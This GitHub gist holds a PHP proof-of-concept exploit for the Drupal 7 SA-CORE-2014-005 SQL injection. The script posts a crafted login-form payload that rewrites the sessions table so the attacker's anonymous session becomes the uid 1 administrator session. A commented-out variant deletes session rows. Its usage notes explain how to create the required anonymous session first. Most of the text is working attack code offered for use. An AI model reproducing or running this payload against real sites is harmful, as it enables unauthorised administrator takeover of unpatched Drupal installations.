Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
This is another PoC for the SA-CORE-2014-005 vulnerability. Instead of updating the users table, activates an anonymous session to change your session into admin.
* D7 autologin.
* Exploits SA-CORE-2014-005 to change your anonymous session into an uid 1 session.
* In order to work, first you need to have an anonymous session in the sessions table.
* One way to achieve this is to go to the update.php page.
* Usage: php d7-autologin.php
* Change the IP with your IP address.
* After that, you should have access to the site by refreshing the page.
* This script is based on the one found here:
$url = $argv[1];
$hostname = $argv[2];
echo "Usage: php script.php [Your IP address]
This script works updating the sessions table. For that, you need to create a session in the DB as an anonymous. An easy way is to get an access denied on the update.php page. Just go to:
echo $url . "/update.php
$post_data = "name[0%20;update+sessions+set+uid%3D1+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
//$post_data = "name[0%20;delete+from+sessions+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Just refresh the update.php page you loaded before.
else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.